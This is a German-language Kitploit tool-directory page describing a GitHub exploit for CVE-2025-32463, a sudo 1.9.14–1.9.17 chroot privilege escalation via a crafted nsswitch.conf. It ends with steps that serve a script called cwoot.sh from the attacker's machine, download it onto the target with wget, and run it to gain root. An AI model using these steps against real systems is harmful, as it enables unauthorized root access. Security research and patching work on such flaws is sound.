Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32463 — Chroot-Privilegieneskalation | Kitploit
Tools/GitHubGitHub/justjoeyking/cve-2025-32463
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Chroot-Privilegieneskalation

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sudo Version 1.9.17 hat eine kritische Schwachstelle (CVE-2025-32463), die es lokalen Benutzern erlaubt, Root-Zugriff zu erlangen, indem sie die chroot-Option ausnutzen, was zu ernsthaften Sicherheitsrisiken führen kann. Benutzern wird empfohlen, auf Version 1.9.17p1 oder neuer zu aktualisieren, um dieses Problem zu beheben.

Übersicht über die Sudo 1.9.17 Schwachstelle:-

Die Schwachstelle in Sudo Version 1.9.17, identifiziert als CVE-2025-32463, ist ein kritischer Fehler, der es lokalen Benutzern ermöglicht, Root-Zugriff zu erlangen. Dieses Problem entsteht durch eine Änderung in der Handhabung der --chroot (-R) Option durch Sudo, die eigentlich Prozesse isolieren soll, indem das Root-Verzeichnis geändert wird.

Wie die Schwachstelle funktioniert:-

  • Problem der Pfadauflösung: In den Versionen 1.9.14 bis 1.9.17 wertet Sudo die --chroot Option aus, bevor es die Benutzerberechtigungen überprüft. Dies ermöglicht es Angreifern, die Umgebung zu kontrollieren und bösartige Bibliotheken zu laden.

  • Ausführungsschritte:

Ein Angreifer erstellt eine bösartige nsswitch.conf Datei in einem von ihm kontrollierten Verzeichnis. Er führt Sudo mit der -R Option aus, wodurch Sudo die Konfiguration und Bibliotheken des Angreifers lädt, was Root-Zugriff gewährt.

Ich habe ein Bash-Skript "cwoot.sh" erstellt, das nach der Ausführung direkt zum Root-Benutzer erhöht.

Gehen Sie wie folgt vor:

Laden Sie das Skript aus dem Repository herunter: git clone https://github.com/justjoeyking/CVE-2025-32463.git

Auf eigenem Rechner: python3 -m http.server 8080

Auf dem Zielrechner: wget http://<own_IP_address>:8080/cwoot.sh

Auf dem Zielrechner: chmod 755 cwoot.sh

Skript auf dem Zielrechner ausführen: ./cwoot.sh

Tool herunterladen